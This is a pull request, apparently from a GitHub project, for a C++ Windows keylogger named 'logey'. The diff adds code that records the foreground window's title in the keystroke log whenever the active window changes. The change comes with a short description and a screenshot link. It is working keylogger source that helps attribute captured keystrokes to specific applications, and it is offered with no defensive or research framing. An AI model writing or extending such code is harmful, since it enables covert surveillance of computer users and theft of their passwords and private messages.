### PR TITLE
Active Window Tracking

### DIFF
--- a/logey.cpp
+++ b/logey.cpp
@@ -32,6 +32,18 @@ void keys(int key, const char *filename) {
 		cout << "Cannot open file for logging." << endl;
 	}
 
+	static string activeWindowTitle = "";
+
+	char windowTitle[256];
+	HWND activeWindow = GetForegroundWindow(); // get handle of currently active window
+	GetWindowText(activeWindow, windowTitle, sizeof(windowTitle));
+
+	if (activeWindowTitle != windowTitle)
+	{
+		fprintf(OUTPUT_FILE, "\n\nWindow %s:\n\n", windowTitle);
+		activeWindowTitle = windowTitle;
+	}
+
 	switch (key) {
 	case VK_RETURN:
 		cout << endl;


### PR DESCRIPTION
Per @xorz57 suggestion, the log will now track when the active window is changed
![logger](https://user-images.githubusercontent.com/10146723/31226625-73ab87de-a99c-11e7-81a1-ab05703d4d53.png)
